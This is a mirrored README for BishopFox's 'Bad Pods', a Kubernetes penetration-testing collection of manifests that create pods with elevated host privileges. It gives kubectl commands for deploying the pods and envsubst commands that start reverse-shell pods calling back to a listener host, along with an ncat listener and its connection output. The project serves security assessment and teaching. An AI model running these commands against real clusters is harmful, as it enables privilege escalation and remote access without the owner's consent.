GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → BishopFox → Badpods

BishopFox / Badpods

Licence: mit
A collection of manifests that will create pods with elevated privileges.

Programming Languages

shell
77523 projects

Labels

securitykubernetespenetration-testingexploitation

Projects that are alternatives of or similar to Badpods

Tigershark
Bilingual PhishingKit. TigerShark intergrates a vast array of various phishing tools and frameworks, from C2 servers, backdoors and delivery methods in multiple scripting languages in order to suit whatever your deployment needs may be.
Stars: ✭ 212 (+127.96%)
Mutual labels:  penetration-testing, exploitation
Reconky-Automated Bash Script
Reconky is an great Content Discovery bash script for bug bounty hunters which automate lot of task and organized in the well mannered form which help them to look forward.
Stars: ✭ 167 (+79.57%)
Mutual labels:  penetration-testing, exploitation
tryhackme-ctf
TryHackMe CTFs writeups, notes, drafts, scrabbles, files and solutions.
Stars: ✭ 140 (+50.54%)
Mutual labels:  penetration-testing, exploitation
Pakuri
Penetration test Achieve Knowledge Unite Rapid Interface
Stars: ✭ 125 (+34.41%)
Mutual labels:  penetration-testing, exploitation
Damn Vulnerable Graphql Application
Damn Vulnerable GraphQL Application is an intentionally vulnerable implementation of Facebook's GraphQL technology, to learn and practice GraphQL Security.
Stars: ✭ 567 (+509.68%)
Mutual labels:  penetration-testing, exploitation
Awesome Bbht
A bash script that will automatically install a list of bug hunting tools that I find interesting for recon, exploitation, etc. (minus burp) For Ubuntu/Debain.
Stars: ✭ 190 (+104.3%)
Mutual labels:  penetration-testing, exploitation
PXXTF
Framework For Exploring kernel vulnerabilities, network vulnerabilities ✨
Stars: ✭ 23 (-75.27%)
Mutual labels:  penetration-testing, exploitation
DevBrute-A Password Brute Forcer
DevBrute is a Password Brute Forcer, It can Brute Force almost all Social Media Accounts or Any Web Application.
Stars: ✭ 91 (-2.15%)
Mutual labels:  penetration-testing, exploitation
Sifter
Sifter aims to be a fully loaded Op Centre for Pentesters
Stars: ✭ 403 (+333.33%)
Mutual labels:  penetration-testing, exploitation
Writeups
This repository contains writeups for various CTFs I've participated in (Including Hack The Box).
Stars: ✭ 61 (-34.41%)
Mutual labels:  penetration-testing, exploitation
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 1,392 (+1396.77%)
Mutual labels:  penetration-testing, exploitation
Awesome Ethical Hacking Resources
🔗 All the resources I could find for learning Ethical Hacking and Penetration Testing.
Stars: ✭ 933 (+903.23%)
Mutual labels:  penetration-testing, exploitation
Vailyn
A phased, evasive Path Traversal + LFI scanning & exploitation tool in Python
Stars: ✭ 103 (+10.75%)
Mutual labels:  penetration-testing, exploitation
Fdsploit
File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
Stars: ✭ 199 (+113.98%)
Mutual labels:  penetration-testing, exploitation
maalik
Feature-rich Post Exploitation Framework with Network Pivoting capabilities.
Stars: ✭ 75 (-19.35%)
Mutual labels:  penetration-testing, exploitation
Hacker Roadmap
📌 Your beginner pen-testing start guide. A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking and web security.
Stars: ✭ 7,752 (+8235.48%)
Mutual labels:  penetration-testing, exploitation
Active Directory Exploitation Cheat Sheet
A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.
Stars: ✭ 870 (+835.48%)
Mutual labels:  penetration-testing, exploitation
Beef Over Wan
Browser Exploitation Framework is a Open-source penetration testing tool that focuses on browser-based vulnerabilities .This Python Script does the changes Required to make hooked Linked Accessible Over WAN .So anyone can use this framework and Attack Over WAN without Port Forwarding [NGROK or any Localhost to Webhost Service Required ]
Stars: ✭ 82 (-11.83%)
Mutual labels:  penetration-testing
Eyes.sh
Let's you perform domain/IP information gathering... in BASH! Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?"
Stars: ✭ 89 (-4.3%)
Mutual labels:  penetration-testing
Mssqli Duet
SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing
Stars: ✭ 82 (-11.83%)
Mutual labels:  penetration-testing
View All Similar Projects ➔

Bad Pods

A collection of manifests that create pods with different elevated privileges. Quickly demonstrate the impact of allowing security sensitive pod attributes like hostNetwork, hostPID, hostPath, hostIPC, and privileged.

For additional background, see our blog post: Bad Pods: Kubernetes Pod Privilege Escalation.

Contents

The Bad Pods line-up

Each link below provides detailed usage information and post exploitation recommendations.

For more general information about prerequisites, repository organization, and common usage patterns, see the sections below.

Prerequisites

  1. Access to a cluster
  2. RBAC permission to create one of the following resource types in at least one namespace:
    • CronJob, DeamonSet, Deployment, Job, Pod, ReplicaSet, ReplicationController, StatefulSet
  3. RBAC permission to exec into pods or a network policy that allows a reverse shell from a pod to reach you.
  4. No pod security policy enforcement, or a policy that allows pods to be created with one or more security sensitive attributes

Organization

  • 128 self-contained, ready to use manifests. Why so many?
    • 8 Bad Pods (hostpid, hostnetwork, everything-allowed, etc.)
    • 8 resource types that can create pods (pod, deployment, replicaset, statefulset, etc.)
    • 2 ways to access the created pods (exec & reverse shell)
├── manifests
│   ├── everything-allowed
│   │   ├── cronjob
│   │   │   ├── everything-allowed-exec-cronjob.yaml
│   │   │   └── everything-allowed-revshell-cronjob.yaml
│   │   ├── daemonset
│   │   │   ├── everything-allowed-exec-daemonset.yaml
│   │   │   └── everything-allowed-revshell-daemonset.yaml
│   │   ├── deployment
│   │   │   ├── everything-allowed-exec-deployment.yaml
│   │   │   └── everything-allowed-revshell-deployment.yaml
│   │   ├── job
│   │   │   ├── everything-allowed-exec-job.yaml
│   │   │   └── everything-allowed-revshell-job.yaml
│   │   ├── pod
│   │   │   ├── everything-allowed-exec-pod.yaml
│   │   │   └── everything-allowed-revshell-pod.yaml
│   │   ├── replicaset
│   │   │   ├── everything-allowed-exec-replicaset.yaml
│   │   │   └── everything-allowed-revshell-replicaset.yaml
│   │   ├── replicationcontroller
│   │   │   ├── everything-allowed-exec-replicationcontroller.yaml
│   │   │   └── everything-allowed-revshell-replicationcontroller.yaml
│   │   └── statefulset
│   │       ├── everything-allowed-exec-statefulset.yaml
│   │       └── everything-allowed-revshell-statefulset.yaml
│   ├── hostipc
│   │   ├── cronjob
│   │   │   ├── hostipc-exec-cronjob.yaml
│   │   │   └── hostipc-revshell-cronjob.yaml
│   │   ├── daemonset
│   │   │   ├── hostipc-exec-daemonset.yaml
│   │   │   └── hostipc-revshell-daemonset.yaml
...omitted for brevity...

There are eight ways to create a pod

As Eviatar Gerzi (@g3rzi) points out in the post Eight Ways to Create a Pod, there are 8 different controllers that can create a pod, or a set of pods. You might not be authorized to create pods, but maybe you can create another resource type that will create one or more pods. For each badPod type, there are manifests that correspond to all eight resource types.

But wait, it gets worse! In addition to the eight current Kubernetes controllers that can create pods, there are third party controllers that can also create pods if they are applied to the cluster. Keep an eye out for them by looking at kubectl api-resources.

Reverse shells

While common, it is not always the case that you can exec into pods that you can create. To help in those situations, a version of each manifest is included that uses Rory McCune's (@raesene) ncat dockerhub image. When created, the pod will make an encrypted call back to your listener.

Usage

Each resource in the manifests directory targets a specific attribute or a combination of attributes that expose the cluster to risk when allowed.

High level approach

Option 1: Methodical approach

  1. Evaluate RBAC - Determine which resource types you can create
  2. Evaluate Admission Policy - Determine which of the Bad Pods you will be able to create
  3. Create Resources - Based on what is allowed, use the specific badPod type and resource type and create your resources
  4. Post Exploitation - Evaluate post exploitation steps outlined in the README for that type

Option 2: Shotgun approach

  1. Create Resources - Just start applying different manifests and see what works
  2. Post Exploitation - For any created pods, evaluate post exploitation steps outlined in the README for that type

Usage Examples

Create all eight Bad Pods from cloned local repo

kubectl apply -f ./manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl apply -f ./manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
kubectl apply -f ./manifests/priv/pod/priv-exec-pod.yaml
kubectl apply -f ./manifests/hostpath/pod/hostpath-exec-pod.yaml
kubectl apply -f ./manifests/hostpid/pod/hostpid-exec-pod.yaml
kubectl apply -f ./manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
kubectl apply -f ./manifests/hostipc/pod/hostipc-exec-pod.yaml
kubectl apply -f ./manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml

Create all eight Bad Pods from Github

kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/priv/pod/priv-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpath/pod/hostpath-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostpid/pod/hostpid-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostnetwork/pod/hostnetwork-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml

Create all eight revsere shell badPods

To avoid having to edit each pod with your host and port, you can environment variables and the envsubst command. Remember to spin up all of your listeners first!

HOST="10.0.0.1" PORT="3111" envsubst < ./manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3112" envsubst < ./manifests/priv-and-hostpid/pod/priv-and-hostpid-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3113" envsubst < ./manifests/priv/pod/priv-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3114" envsubst < ./manifests/hostpath/pod/hostpath-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3115" envsubst < ./manifests/hostpid/pod/hostpid-revshell-pod.yaml  | kubectl apply -f -
HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/hostnetwork/pod/hostnetwork-revshell-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3117" envsubst < ./manifests/hostipc/pod/hostipc-revshellv-pod.yaml | kubectl apply -f -
HOST="10.0.0.1" PORT="3118" envsubst < ./manifests/nothing-allowed/pod/nothing-allowed-revshell-pod.yaml | kubectl apply -f -

Create a cronjob with the hostNetwork pod

kubectl apply -f manifests/hostnetwork/cronjob/hostnetwork-exec-cronjob.yaml

Find the created pod

kubectl get pods | grep cronjob
 
NAME                                        READY   STATUS    RESTARTS   AGE
hostnetwork-exec-cronjob-1607351160-gm2x4   1/1     Running   0          24s

Exec into pod

kubectl exec -it hostnetwork-exec-cronjob-1607351160-gm2x4 -- bash

Create a deployment with the priv-and-hostpid pod

kubectl apply -f manifests/priv-and-hostpid/deployment/priv-and-hostpid-exec-deployment.yaml

Find the created pod

kubectl get pods | grep deployment

priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9   1/1     Running   0          56s
priv-and-hostpid-exec-deployment-65dbfbf947-tghqh   1/1     Running   0          56s

Exec into pod

kubectl exec -it priv-and-hostpid-exec-deployment-65dbfbf947-qwpz9 -- bash

Create all eight resource types using the everything-allowed pod

find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl apply -f {} \;

cronjob.batch/everything-allowed-exec-cronjob created
daemonset.apps/everything-allowed-exec-daemonset created
deployment.apps/everything-allowed-exec-deployment created
job.batch/everything-allowed-exec-job created
pod/everything-allowed-exec-pod created
replicaset.apps/everything-allowed-exec-replicaset created
replicationcontroller/everything-allowed-exec-replicationcontroller created
service/everything-allowed-exec-statefulset-service created
statefulset.apps/everything-allowed-exec-statefulset created

View all of the created pods

kubectl get pods

NAME                                                  READY   STATUS    RESTARTS   AGE
everything-allowed-exec-daemonset-qbrdb               1/1     Running   0          52s
everything-allowed-exec-deployment-6cd7685786-rp65h   1/1     Running   0          51s
everything-allowed-exec-deployment-6cd7685786-m66bl   1/1     Running   0          51s
everything-allowed-exec-job-fhsbt                     1/1     Running   0          50s
everything-allowed-exec-pod                           1/1     Running   0          50s
everything-allowed-exec-replicaset-tlp8v              1/1     Running   0          49s
everything-allowed-exec-replicaset-6znbz              1/1     Running   0          49s
everything-allowed-exec-replicationcontroller-z9k8n   1/1     Running   0          48s
everything-allowed-exec-replicationcontroller-m4648   1/1     Running   0          48s
everything-allowed-exec-statefulset-0                 1/1     Running   0          47s
everything-allowed-exec-statefulset-1                 1/1     Running   0          42s

Delete all everything-allowed resources

find manifests/everything-allowed/ -name "*-exec-*.yaml" -exec kubectl delete -f {} \;

Create a reverse shell using the privileged pod

Set up listener

ncat --ssl -vlp 3116

Create pod from local yaml without modifying it by using env variables and envsubst

HOST="10.0.0.1" PORT="3116" envsubst < ./yaml/priv/pod-priv-revshell.yaml | kubectl apply -f -

Catch the shell

ncat --ssl -vlp 3116
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: Listening on :::3116
Ncat: Listening on 0.0.0.0:3116

Connection received on 10.0.0.162 42035

Contributing

Pull requests and issues welcome.

Acknowledgements

Thank you Rory McCune, Duffie Cooley, Brad Geesaman, Tabitha Sable, Ian Coldwater, Mark Manning, Eviatar Gerzi, and Madhu Akula for publicly sharing so much knowledge about Kubernetes offensive security.

References and further reading

Each Bad Pod has it's own references and further reading section, but here are some more general resources that will help you ramp up your Kubernetes security assessments and penetration tests skills.

New kids on the block - 2020

The classics, way back from 2019

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].